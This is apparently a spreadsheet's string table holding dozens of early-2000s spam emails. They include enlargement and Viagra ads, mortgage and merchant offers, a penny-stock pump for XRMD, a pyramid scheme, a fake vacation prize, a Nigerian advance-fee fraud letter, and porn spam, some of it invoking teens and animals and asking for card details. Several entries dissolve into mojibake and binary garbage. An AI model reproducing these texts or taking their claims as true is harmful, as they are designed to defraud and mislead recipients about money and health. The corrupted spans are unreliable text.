NET OPSPO BOX 4731Omaha, NE 68104NAME_______________________________________________ADDRESS____________________________________________CITY/STATE/ZIP______________________________________E-MAIL ______________________________________________THIS INFORMATION IS SOLD FOR EDUCATIONAL PURPOSES ONLY.If you would like to be removed alloff1@btamail.net.cn</t>
  </si>
  <si>
    <t xml:space="preserve">Untitled DocumentÂ 
Click 
  Here to enlarge your penis 3-4 inches naturally
Â 
Click Here to be removed
</t>
  </si>
  <si>
    <t xml:space="preserve">
Beautiful,Custom Websites for $399 Complete!
Beautiful, 100% Custom 
      Websites, $399 Complete!
Get a beautiful, 100% Custom Web Site (or 
                        yours redesigned)Â for only 
                        $389!*We have references coast to 
                        coastÂ and will give you plenty of sites to 
                        view!
Includes up to 
                  7 pages (you can add more), java rollover buttons, feedback 
                  forms, more. It will be constructed to your taste and 
                  specifications. We do not use templates,Â  our sites 
                  are completely custom.Â Â Â  *Must host with us @ 
                  $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front 
                  Page, Graphical Statistics, 
                  more).Â 
For sites to 
                  view, complete below or call our message center at 
                  321-726-2209 (24 hours). Your call will be returned 
                  promptly.NOTE:Â Â  If you are using a web 
                  based email program (such as Yahoo, Hotmail, etc.) the form 
                  below will not work.Â  Instead of using the 
                  form,Â  CLICK 
                  HERE .Â Â Â  Name: Phone 
                  w/AC*:State: Type Project: New Site:Redesign Flash Intro/bannerÂ Â  Current 
                  site?:Comments:Â Â If you do not wish to 
            receive our messages, CLICK 
            HERE Â  (Please enter 
            ALL email addresses (in the body of the message) you wish to have 
            eliminated from future 
        mailings.[3121jDvN9-@9]
</t>
  </si>
  <si>
    <t>Wanna see sexually curious teens playing with each other?http://www.site-personals.com &lt;-- click here=)me and my horny girlfriends are waiting for you... we are probably eating each other out on webcam in our dormitory as ur reading this! (inbetween classes of course *wink*)see you soon baby,
-Veronica
mcmfkhcpedgetqj</t>
  </si>
  <si>
    <t>Whiter teeth and a brighter smile are just a click away! 
http://www.newnamedns.com/dental/Have you considered professional teeth whitening? If so, you know it usually costs between $300 and $500 from your local dentist!Visit our site to learn how to professionally whiten your teeth, using the exact same whitening system your dentist uses, at a fraction of the cost!We know our product is the best on the market, and we back it with a 30 day money back guarantee!Click here to find out more!
http://www.newnamedns.com/dental/
---------------------------------------
To easily remove your address from the list, go to: 
http://www.newnamedns.com/stopthemailplease/
Please allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t xml:space="preserve">INVESTMENT SCHOLARS CLUB- bringing you the latest from the financial epicenter. Research Alert - Undervalued
August 26, 2002
XrayMedia
(OTCBB: XRMD) Alert Rating = 8Congratulations to our subscribers who moved in fast on our last report! Pick #1 - Internet incubator giant CMGI has paid off very well, up over 150% on major volume and great news.Pick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itsÂ’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weÂ’ve never seen anything like it!How does the company do this? XrayMedia (OTCBB: XRMD) The Company founded XrayMedia in March 2000 to create a "mass source to advertising sector " live negotiating technology and advertising purchase financing accents the companyÂ’sÂ’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usersÂ’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valuation under 10 mm.*** It has opened accounts with over hundreds of buyers and sellers including some of the largest media buyers in the world, major retailers and smaller retailers. *** Attracting interest of major investment bankers and analysts, also a possible acquisition target at some point by major retailers.*** Received largest order of advertising financing over $500k with more contracts accumulating.*** Revenue growth is expected to be dramatic $1mm to $5mm. *** The company is expected to report a profitable quarter, to grow revenues and earnings "substantially" when it begins its 2003 fiscal year in January.
Shares Outstanding:      	83 mm
Float:                         	5  mm
Recent Price:               	$00.08
Year Low/High:            	$00.02 - $00.19
18-Month Target Price:  	$5.00+Company Contact: Ray Dabney 
Toll free:  1(888) 777-0658     (h3)6926Zjpl7
</t>
  </si>
  <si>
    <t>Request A Free No Obligation Consultation!
Accept Credit Cards Today!
No Set Up Fees
No Application Fees
All Credit Types Accepted
Retail Rates as Low as 1.60%
Mail Order Rates As Low as 2.30%
Set Up Your Merchant Account within 48 Hours
NO CANCELLATION FEES
No Money Down
No Reprogramming Fees
We Will Beat Anybodyâ€™s Deal By 15%We make it easy and affordable to start accepting Credit Cards today.
99% of our applicants are approved!http://64.251.23.141/marketing/merchantnet/to be removed : http://64.251.23.141/marketing/removeme.html</t>
  </si>
  <si>
    <t xml:space="preserve">PoliceAuctions.coma:link{font-family:verdana;color:003399;font-size:14px;font-weight:bold;text-decoration:none;}
a:hover{font-family:verdana;color:ff0000;font-size:14px;font-weight:bold;text-decoration:underline;}
a:active{font-family:verdana;color:ff0000;font-size:14px;font-weight:bold;text-decoration:underline;}
a:visited{font-family:verdana;color:003399;font-size:14px;font-weight:bold;text-decoration:underline;}
			Awesome deals on seized and unclaimed 
              property the government auctions to the public. Cars from $100,
              Real estate, jewelry, personal property, collectibles, antiques
              and more.CLICK HERE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</si>
  <si>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HABERDAR.COM - HABER VE MEDYA PORTALI
Artï¿½k tï¿½m haberleri sadece tek siteden takip edebileceksiniz. Haberdar.com aï¿½ï¿½ldï¿½!
Haber baï¿½lï¿½klarï¿½, spor haberleri, teknoloji haberleri, kï¿½ltï¿½r ve sanat haberleri, internet haberleri, bilim ve uzay, 
sinema, saï¿½lï¿½k...
Aradï¿½ï¿½ï¿½nï¿½z iï¿½erik http://www.haberdar.com adresinde
Sadece tï¿½klayï¿½n ve haberdar olunï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½+,ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½'ï¿½ï¿½ï¿½uï¿½ï¿½9 ï¿½ï¿½8ï¿½yï¿½_x001F_ï¿½_x0016_ï¿½ï¿½ï¿½ï¿½ï¿½W\zYiï¿½ï¿½ï¿½ï¿½gï¿½jwï¿½ï¿½ï¿½ï¿½~ï¿½ï¿½DAï¿½ï¿½ï¿½iï¿½ï¿½ï¿½ï¿½_x000C_ï¿½ï¿½zaï¿½xï¿½ï¿½ï¿½&amp;ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½_x001E_ï¿½ï¿½ï¿½}ï¿½_x001D_{ï¿½}ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½J+^ï¿½ï¿½(ï¿½ï¿½ï¿½ï¿½ï¿½dï¿½ï¿½ï¿½ï¿½x%ï¿½ï¿½Rï¿½ï¿½ï¿½rï¿½)zï¿½ï¿½jYï¿½ï¿½+-ï¿½ï¿½(ï¿½ï¿½_x001E_~ï¿½ï¿½{ï¿½ï¿½ï¿½_x001B_mï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½yï¿½+ï¿½ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½lï¿½Xï¿½ï¿½)ï¿½ï¿½ï¿½"ï¿½ï¿½_x001C_ï¿½ï¿½^ï¿½ï¿½Z</t>
  </si>
  <si>
    <t>SUBSTANTIAL MONTHLY INCOME MAKERS VOUCHER
Income Transfer Systems/Distribution Center
************************************************************
Pending Income Amount:  up to $21,000.00Action:http://www.hotresponders.com/cgi-bin/varpro/vartrack.cgi?t=wendy7172:1
************************************************************
Good News!  You have made the Substancial Income Makers list.  This means you get the entire system and get the opportunity to make up to $21,000.00 a month.To receive this system, follow this link!  
       http://www.hotresponders.com/cgi-bin/varpro/vartrack.cgi?t=wendy7172:1Get ready, you will immediately receive all the information needed to make a substantial monthly income.
What are you waiting for!!  http://www.hotresponders.com/cgi-bin/varpro/vartrack.cgi?t=wendy7172:1You are receiving this email due to having requested info on internet businesses.  If you are not longer looking for one, please click the remove link below. 
Click on the link below to remove yourself
http://www.hotresponders.com/cgi-bin/varpro/r.cgi?id=wendy7172&amp;a=ilug@linux.ieAOL Users
 Remove Me-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>YOUR SEX DRIVE SHOULD NEVER BE SECOND ON THE LIST!!!
VIAGRA ONLINE NOW AND SHIPPED WITHIN 24 HOURS!
http://buy-onlinepills.com/main2.php?rx=16372STAY HARD THE WAY YOU ONCE COULD!!!
LESS THAN $7.00 PER DOSE TO MAKE IT ALL HAPPEN AGAIN!
http://buy-onlinepills.com/main2.php?rx=16372DON'T SETTLE FOR LESS, KEEP YOUR LOVER HAPPY!
http://buy-onlinepills.com/main2.php?rx=16372No Doctor office's to visit.  Simply fill  out our
online form, and our U.S. Doctor will write your
prescription and send it within 48 hours.http://buy-onlinepills.com/main2.php?rx=16372MOST MAJOR PRESCRIPTION DRUGS ALSO!CLICK BELOW FOR MORE INFORMATION:http://buy-onlinepills.com/main2.php?rx=16372We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http://greenzer.com/remove.php to be removed from the list. Please accept our apologies if you have been sent this email in error. We honor all removal requests.</t>
  </si>
  <si>
    <t xml:space="preserve">
______________________________________________________________________
______________________________________________________________________LOWEST RATES IN 45 YEARS -
FILL OUT OUR SHORT APPLICATION FOR AN UNBELIEVABLE 3.50 - 5.0 % MORTGAGE
(APR)  () HOME REFINANCING
  () HOME IMPROVEMENT
  () DEBT-CONSOLIDATION
  () CASH-OUTPlease Click HERE
for our short application.The following are NO problem and will not stop you from getting the
financing you need:  *** Can't show income
  *** Self-Employed
  *** Credit Problems
  *** Recent Bankruptcy
  *** Unconventional LoanWe are a direct lender and we have hundreds of loan programs available.
If we don't have a program that works for you, we have hundreds of wholesale
relationships with other lenders. So no matter which of our
50 states you live in, we likely have a program that could meet your
needs.Please Click HERE
for our short application.* We DO NOT resell or disseminate your email address. You are NOT
required to enter your SSN. This is a legitimate offer from legitimate
mortgage companies.======================================================================
Note: We are licensed in all 50 U.S. States.
======================================================================To be REMOVED from future mailings click HERE.We will NEVER intentionally email you again. Thank You.______________________________________________________________________
______________________________________________________________________
.........................................</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 (jamie@msn.com) on Tuesday, August 27, 2002 at 22:26:56
---------------------------------------------------------------------------:: click hereDon't want to pay for Porn? Would you like to get it for FREE? The Honest, No Risk 100% Free Way? If you take a couple of minutes and read through our simple guide you will be able to get Free Passes to the top Paysites online!click here---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t>=================================Guaranteed to increase, lift and firm your
breasts in 60 days or your money back!!100% herbal and natural.  Proven formula since 
1996.  Increase  your bust by 1 to 3 sizes within 30-60 
days and be all natural.  Click here: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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=zzzz@marchettieng.com</t>
  </si>
  <si>
    <t xml:space="preserve">Removal instructions below
I saw your listing on the internet.  I work
for a company that submits websites to search
engines.  We can submit your website to over
350 of the worlds best search engines and 
directories for a one time charge of only
$39.95.  If you would like to put your website in 
the fast lane and receive more
traffic call me on our toll-free number
listed below.  All work is verified!
Sincerely,
Brian Franks
888-532-8842To be removed call:888-800-6339 Ext. 1377
</t>
  </si>
  <si>
    <t xml:space="preserve">You're 
    A Winner! Dear Traveler, Congratulations
you may be one of our LUCKY WINNERS! 
You may be spending 
  your next vacation in beautiful Orlando Florida!6 days 
    and 5 nights 
    of accommodations in sunny Orlando Florida 
Round trip
 AIRFARE INCLUDED for 
    two
Rental 
    car with UNLIMITED MILEAGE
2 day pass 
    to
UNIVERSAL STUDIOS
$500 
    coupon book for meals and entertainment
2 CASINO 
    CRUISE ticketsTo claim your 
  prize just visit our website Click hereThanks for entering 
  our contest and we look forward to seeing you soon. 
Sincerely, 
Jacqueline O'Connor
  Director of Promotoins
P.S. Youâ€™ve 
  got to hurry. If you donâ€™t claim your vacation in the next 24 hours
  it may be gone. Availability is limited. So donâ€™t wait,
Click 
  here today. Â 
  To be excluded from future promotions Click here
</t>
  </si>
  <si>
    <t>==========================================================================Now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http://61.129.68.19/user0201/index.asp?Afft=QM3============================================================================To Unsubscribe: http://61.129.68.19/light/watch.asp</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</si>
  <si>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http://market.liangshanpo.com/hgh/Would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http://market.liangshanpo.com/hgh/
**************************************************
If you want to get removed
from our list please email at- affiliateoptout@btamail.net.cn
(subject=remove "your email")
**************************************************</t>
  </si>
  <si>
    <t xml:space="preserve">Attention U.S. HomeOwners 
If you want to save an extra $30,000 (average savings) 
on your mortgage even if you have already refinanced
CLICK HERE
We also have the lowest rates and most professional 
and friendly service you will experience.Â  We will 
answer your questions with no obligation.
CLICK HERE
We have rates as low as 4.65% and Loans for all
types of people and situations.
For those of you who have a mortgage and have been 
turned down we can still save you around $30,000.
CLICK HERE for a FREE, friendly
quote.
Â 
Â 
If you no longer wish to receive our offers and updates  click hereÂ 
 and we will promptly honor your request.
</t>
  </si>
  <si>
    <t>THE CONVIENENCE OF
&lt;!--
 /* Font Definitions */
@font-face
	{font-family:Wingdings;
	panose-1:5 0 0 0 0 0 0 0 0 0;
	mso-font-charset:2;
	mso-generic-font-family:auto;
	mso-font-pitch:variable;
	mso-font-signature:0 268435456 0 0 -2147483648 0;}
@font-face
	{font-family:Tahoma;
	panose-1:2 11 6 4 3 5 4 4 2 4;
	mso-font-charset:0;
	mso-generic-font-family:swiss;
	mso-font-pitch:variable;
	mso-font-signature:553679495 -2147483648 8 0 66047 0;}
 /* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{mso-style-parent:"";
	margin:0in;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:10.0pt;
	font-family:"Times New Roman";
	mso-fareast-font-family:"Times New Roman";}
h1
	{mso-style-next:Normal;
	margin:0in;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	page-break-after:avoid;
	mso-outline-level:1;
	font-size:36.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	mso-font-kerning:0pt;
	font-weight:normal;}
h2
	{mso-style-next:Normal;
	margin:0in;
	margin-bottom:.0001pt;
	text-align:center;
	mso-pagination:widow-orphan;
	page-break-after:avoid;
	mso-outline-level:2;
	font-size:48.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	font-weight:normal;}
h3
	{mso-style-next:Normal;
	margin:0in;
	margin-bottom:.0001pt;
	text-align:center;
	mso-pagination:widow-orphan;
	page-break-after:avoid;
	mso-outline-level:3;
	font-size:24.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	font-weight:normal;}
h4
	{mso-style-next:Normal;
	margin:0in;
	margin-bottom:.0001pt;
	text-align:center;
	mso-pagination:widow-orphan;
	page-break-after:avoid;
	mso-outline-level:4;
	font-size:36.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	font-weight:normal;}
h5
	{mso-style-next:Normal;
	margin-top:0in;
	margin-right:0in;
	margin-bottom:0in;
	margin-left:.25in;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	page-break-after:avoid;
	mso-outline-level:5;
	font-size:16.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	font-weight:normal;}
h6
	{mso-style-next:Normal;
	margin-top:0in;
	margin-right:0in;
	margin-bottom:0in;
	margin-left:.25in;
	margin-bottom:.0001pt;
	text-align:center;
	mso-pagination:widow-orphan;
	page-break-after:avoid;
	mso-outline-level:6;
	font-size:16.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	font-weight:normal;}
p.MsoHeading7, li.MsoHeading7, div.MsoHeading7
	{mso-style-next:Normal;
	margin:0in;
	margin-bottom:.0001pt;
	text-align:center;
	mso-pagination:widow-orphan;
	page-break-after:avoid;
	mso-outline-level:7;
	font-size:16.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	mso-fareast-font-family:"Times New Roman";}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
	{margin:0in;
	margin-bottom:.0001pt;
	mso-pagination:widow-orphan;
	font-size:20.0pt;
	mso-bidi-font-size:10.0pt;
	font-family:Tahoma;
	mso-fareast-font-family:"Times New Roman";}
a:link, span.MsoHyperlink
	{color:blue;
	text-decoration:underline;
	text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
	{color:purple;
	text-decoration:underline;
	text-underline:single;}
@page Section1
	{size:8.5in 11.0in;
	margin:.5in .5in .1in .5in;
	mso-header-margin:.5in;
	mso-footer-margin:.5in;
	mso-paper-source:0;}
div.Section1
	{page:Section1;}
 /* List Definitions */
@list l0
	{mso-list-id:167256993;
	mso-list-type:hybrid;
	mso-list-template-ids:537322506 67698689 67698691 67698693 67698689 67698691 67698693 67698689 
67698691 67698693;}
@list l0:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:.5in;
	mso-level-number-position:left;
	text-indent:-.25in;
	font-family:Symbol;}
ol
	{margin-bottom:0in;}
ul
	{margin-bottom:0in;}
--&gt;THE CONVENIENCE OF
CHICAGO
EASY ON YOUR BUDGET
Â 
When planning your next Chicago meeting consider the 
Â 
Radisson Hotel
Chicago-Northshore
Â 
ï¿½Â Â Â Â Â  Great
location just 8 miles north of Downtown Chicago off I-94 Expressway
ï¿½Â Â Â Â Â  $85 State
Government Rate with only 6% Sales Tax (Chicago 14.9%, Rosemont 12%)
ï¿½Â Â Â Â Â  Oï¿½Hare
Shuttle Service Available
ï¿½Â Â Â Â Â  Free High
Speed Internet Access
ï¿½Â Â Â Â Â  Free
Ample Parking
ï¿½Â Â Â Â Â  State
Certified Minority Business Enterprise (MBE) #363778006
ï¿½Â Â Â Â Â  18000+
Square Feet of Flexible Meeting Space
ï¿½Â Â Â Â Â  #3 Rated
Hotel for Customer Service in Entire Radisson Chain Worldwide*
ï¿½Â Â Â Â Â  Great
Restaurants, Shopping &amp; Activities
ï¿½Â Â Â Â Â  FEMA
#IL-0458 and ADA Compliant
Â 
Contact Riz Bhatti @ 1847-677-1234
ext. 6884 or
Donald Bae @ 1847-677-1234 ext. 6880
Take a virtual tour of our hotel @ www.radisson-chicago.com
Â Â December 2001 Customer Satisfaction Survey-Radisson
Worldwide Hotels and Resorts</t>
  </si>
  <si>
    <t xml:space="preserve">
ï¿½ï¿½_x0011_ï¿½ï¿½ï¿½_x001A_ï¿½ Worldwide*
Great Restaurants, Shopping &amp; Activities
FEMA #IL-0458 and ADA CompliantContact Riz Bhatti @ 1847-677-1234 ext. 6884 or
Donald Bae @ 1847-677-1234 ext. 6880
Take a virtual tour of our hotel @ _x0013_ HYPERLINK "http://www.radisson-chicago.com" _x0001__x0014_www.radisson-chicago.com_x0015_
December 2001 Customer Satisfaction Survey-Radisson Worldwide Hotels and Resorts
_x0013_ EMBED MS_ClipArt_Gallery.5  _x0014__x0001__x0015_
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
                 Do You Want To Teach and Grow Rich?If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annually.Many are called, few are chosen.  This opportunity will be limited to one qualified individual per state.  Make the call and call the 24 hour pre-recorded message number below.  We will take as much or as little time as you need to see if this program is right for you.                            *** 801-397-9010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801-397-9010 *** 
_______________________________________________________________ 
*To be taken out of this database: 
  secco44@poetic.com  9059Dmel0-270bmbl15
5677ZUad6-196gUSL4757Wrmh7-794oPGX9206MkEq3-551QUHl47</t>
  </si>
  <si>
    <t xml:space="preserve">
</t>
  </si>
  <si>
    <t>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you....http://www.site-personals.com  &lt;---click and access me instantly hunnie;)later baby,
mmwa!ewidvtdksrvaptnjsvsgeqcpafu-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,My name is Petr Stanek and I am managing the Iraq Today
news service (www.europeaninternet.com/iraq). Iraq Today
contains hourly updated breaking news headlines, exchange rates,
market news and other important information.You and your associates can have a FREE TRIAL
SUBSCRIPTION to Iraq Today.You will have access to a collection of 25,000 daily updated
articles, a news archive and many other benefits too.Once again, this trial is FREE. To subscribe, just reply to this
e-mail or sign up at:
http://www.europeaninternet.com/login/affiliate_register.php3A partial list of current EIN subscribers can be found at:
http://www.europeaninternet.com/mediakit/If you have any questions, comments, or need assistance signing
up, please contact us personally by either writing to
helpdesk@europeaninternet.com or simply replying to this email.Please feel free to forward this offer to any of your colleagues.Best regards,Petr Stanek
Subscription Department
EIN NewsTo be removed please reply to: remove@europeaninternet.com
</t>
  </si>
  <si>
    <t>###################################  FREE Adult Lifetime Membership
      Limited Time Offer!!!###################################YOUR INSTANT ACCESS PASSWORD
LOGIN NAME:   zzzz@spamassassin.taint.org 
PASSWORD:     AcKWGy4L5 of the Best Adult Sites on the Internet for FREE!---------------------------NEWS 08/28/02
Over 3.1 Million Members have signed up for FREE, Last month 229,947
New Members signed up for Free with the limited time offer.
Are you a FREE Member yet???---------------------------Our Membership FAQQ. Why are you offering free access to 5 adult membership sites for free?A. We have advertisers that pay us for ad space so you don't have to
pay for a membership.Q. Is it true that your membership is Free for life?
A. Absolutely, you'll never have to pay a cent the advertisers do.Q. Do I have to sign up for all 5 FREE membership sites?
A. No, just one to get access to all of them.Q. Why do I have to give my Credit Card Information?
A. It's for age verification purposes only and you will not be charged.
   If you don't believe us, just read their terms and conditions.Q. How do I get started?
A. Click on one of the links below to become a Free member.---------------------------# 5. &gt; Adults Farm
http://80.71.66.8/farm/?aid=993751
Girls and Animals Getting Freaky....FREE Lifetime Membership!!# 4. &gt; Sexy Celebes
http://80.71.66.8/celebst/?aid=993751
Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!# 3. &gt; Play House Porn
http://80.71.66.8/play/?aid=993751
Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!# 2. &gt; Lesbian Lace
http://80.71.66.8/lesbian/?aid=993751
Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!# 1. &gt; Teen Sex Fantasies
http://80.71.66.8/teen/?aid=993751
Teen Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!--------------------------Jennifer Simpson, Miami, FL
Your FREE lifetime membership has entertained my boyfriend and I for
the last two years!  Your Adult Sites are the best on the net!Joe Morgan Manhattan, NY
Your live sex shows and live sex cams are unbelievable. The best part
about your porn sites, is that they're absolutely FREE!--------------------------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removal.This e-mail is sent in compliance with the Information Exchange
Promotion and Privacy Protection Act. section 50 marked as
'Advertisement' with valid 'removal' instruction.bdyjkpbwheotewwcloiveajvkidto</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</si>
  <si>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excluded by visiting HERE
beverley
</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</si>
  <si>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go:http://www.basetel.com:27000/wealthnowWe are looking for energetic and self motivated people.  If that is you
than click on the link and fill out the form, and one of our
employement specialist will contact you.To be removed from our link simple go to:http://www.basetel.com:27000/remove.html
7227aeeO9-622YVDD8442BJPk2-748ZYrZ8462VnMG1-197fVVA2035gqEj3-l57</t>
  </si>
  <si>
    <t>Wanna see sexually curious teens playing with each other on webcam?http://www.yourtastybaby.net  &lt;----- our webcam link=)me and my dorm mate are eating each other out as we speak!see you soon baby,
-Tiffanykludlkaiplcqcnnaigaybaxhesrhltsp</t>
  </si>
  <si>
    <t>www.low-interest-rates.net&lt;!--
td {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 12px;
	color: black;
}text {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 11px;
	color: black;
}text2 {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 12px;
	color: black;
}header {
	font-family: Trebuchet MS, Verdana, Tahoma, sans-serif;
	font-size: 17px;
	color: white;
}title {
	font-family: Trebuchet MS, Verdana, Tahoma, sans-serif;
	font-size: 20px;
	color: #D6CFAB;
	font-weight: bold;
}h4 {
	color: #B5C943;
	font-family: Tahoma, sans-serif;
}footer {
	font-family: Verdana, Tahoma, sans-serif;
	font-size: 10px;
	color: white;
	font-weight: bold;
}a.footer {color: white; text-decoration: none;}
a.footer:visited {color: white; text-decoration: none;}
a.footer:hover {color: white; text-decoration: underline;}button {
	font-size: 11px;
	border-width: 0;
	background-color: #476f8f;
	color: white;
	font-family: Verdana, Tahoma, sans-serif;
	font-weight: bold;
}
#selected {
	color: #F5989D;
	text-decoration: none;
}clicker {cursor: hand}
a {color: white; text-decoration: none;}
//--&gt;
Â Â Â Â Â Â quotepoolmortgageâ„¢
We're different and it's a difference that can save you time and money.
We can help you:â€¢Refinance to get a lower rate
â€¢Consolidate your high-interest debt
â€¢Lower your monthly payments
â€¢Get extra cash for a vacation
â€¢Pay for tuition
â€¢Start home improvements
â€¢Purchase a New Home
We understand that there are a lot of decisions to make when securing a mortgage loan or refinancing your current loan.  That's why we have mortgage EXPERTS with years of EXPERIENCE to help you make the right decisions.  Credit doesn't have to be an issue either.  Whether your credit's perfect or less than perfect, we can help you find the best deal on your home loan. Our quick, FREE, easy form will put you in contact with the top brokers in the business!
DON'T Miss The Opportunity to SAVE!
Now is the perfect time to secure your mortgage loan.  With our country in a recession, the federal government keeps LOWERING INTEREST RATES to help stimulate the economy.  It is a win-win situation and it benefits mostly YOU, the homeowner! Try it now!
There are NO excuses. There are great rates available, it's a simple form, and it costs you NOTHING to fill out for a FREE quote.
PROCEED HERE
Â Â Â Â Â  Privacy | Unsubscribe</t>
  </si>
  <si>
    <t xml:space="preserve">Big and big
MAIN PAGE
Huge big titties @ bigbigs.com! MORE SAMPLE PICS Â Â Â Â  MORE SAMPLE MOVIES Â Â Â Â  LIST OF GIRLS 
Â 
CLICK
          HERE to enlarge your PENIS 3-4 inches NATURALLY!!!
Â 
Click
          Here to be removed
</t>
  </si>
  <si>
    <t xml:space="preserve">
FREE* cKbe fragranceCongratulations JM@NETNOTEINC.COM!
Dear JM@NETNOTEINC.COM,
You've been selected to receive a bottle of Calvin Klein'sï¿½ cKbe - FREE*.Click here now for the scent that's great for both men and women.It's the perfect scent to wear for any occassion. It's light, and just a little citrusy - you'll love it for Summer!  Click here now and we'll send this refreshing scent right out to you.With only a few bottles on hand, I know they won't last long. Guarantee your own good fortune - and click here to claim your very own bottle of Calvin Klein'sï¿½ cKbe.JM@NETNOTEINC.COM act now and click here for a one time only chance!Sincerely,Lori Anderson
YourFreePresent.comP.S. Please feel free to forward this great offer to a friend!*All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</si>
  <si>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DEMOEliminate or Reduce Travel ExpenseTry this on for savings... 
and turn those unnecessary trips into problem solving and fact finding conferences, 
saving time and wear and tear on your overworked business staff. To find out more about this revolutionary concept,
fill out the form below.
Required Input Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
All information given herein is strictly confidential and will not be re-distributed
      for any reason other than for the specific use intended.
To be removed from our distribution lists, please  
      Click 
      here..
</t>
  </si>
  <si>
    <t>Wind up your mates today! Please visit http://ukprankcalls.com</t>
  </si>
  <si>
    <t>Everybody gets paid.  No recruiting required.Join and reserve a position for free now.
Program is 18 weeks old and it's paying.Everybody gets in line to get paid by all
the new people coming in (but it's NOT a
traditional straightline)...EVERYONE makes money...
and those that sponsor make more....Click here to request for more informationWe belong to the same opt-in list. But if wish to have your email
address REMOVE from our database please click here</t>
  </si>
  <si>
    <t>Everybody gets paid.  No recruiting required.Join and reserve a position for free now.
Program is 18 weeks old and it's paying.Everybody gets in line to get paid by all
the new people coming in (but it's NOT a
traditional straightline)...EVERYONE makes money...
and those that sponsor make more....Click here to request for more informationWe belong to the same opt-in list. But if wish to have your email
address REMOVE from our database please click here
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie</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</si>
  <si>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report:http://vicky.mothost.com/euro1/In addition to our currency report, you can receive
our FREE INVESTMENT PACKAGE:*  Learn how $10,000 in options will leverage $1,000,000 in
Euro Currency. This means even a small movement in the market
has huge profit potential.If you are over age 18 and have some risk capital, it's
important that you find out how the Euro will
change the economic world and how you can profit!http://vicky.mothost.com/euro1/$10,000 minimum investmentPlease carefully evaluate your financial position before
trading.  Only risk capital should be used.http://vicky.mothost.com/euro1/optout.html To OptOut.
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;From the desk of: DR. SAMUEL EBOKA.
Tel No: Your Intl. Access Code + 873762692484
Fax No: Your Intl. Access Code + 873762692485
email : samueleboka2@email.com
Lagos, Nigeria.
Dear Sir,IMPORTANT.After due deliberation with my colleagues, We have decided to forward to
you this business proposal. We want a reliable 
person who could assist us in the transfer the sum of Twenty Million, Five
Hundred Thousand United States Dollars ( 
$20,500,000 ). Via International Bank Draft Cashable in any First World
Countries.This fund resulted from an over-invoiced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US$20.5M as part 
of the over-invoiced amount which we have deliberated over estimated for
our own use. But under our protocol division, we 
as civil servants are forbidden to operate or own foreign accounts. This
is why we are soliciting your assistance in this 
manner and regard .As you may want to know and to make you less curious, I got your address
from adverts in the business directory . I am the 
Chief Accountant/Internal Auditor of the Contract Award Committee ( CAC )
of the Nigerian National Petroleum Corporation 
( NNPC). This transaction is very much free from all sorts of RISKS and
TROUBLE from my Government. We the N.N.P.C. 
Officials involved in this deal have put in many years in service to this
Ministry. We have been exercising patience for this 
opportunity for so long and to most of us this is a life time opportunity
we cannot afford to miss.We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favor.Consequent upon your acceptance of this proposal, kindly confirm your
interest by Telephone to me, through my Direct Tel 
No: +873-762-692484. (Please Call Direct, DO NOT add my country(234) and
City(1) codes ) .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everyoneÂ’s interest and
security had been considered before you were contacted, so be rest assured
and feel free to go into this transaction with 
us.
But let Honesty and Trust be our watchword throughout this transaction and
your prompt reply will be highly appreciated. 
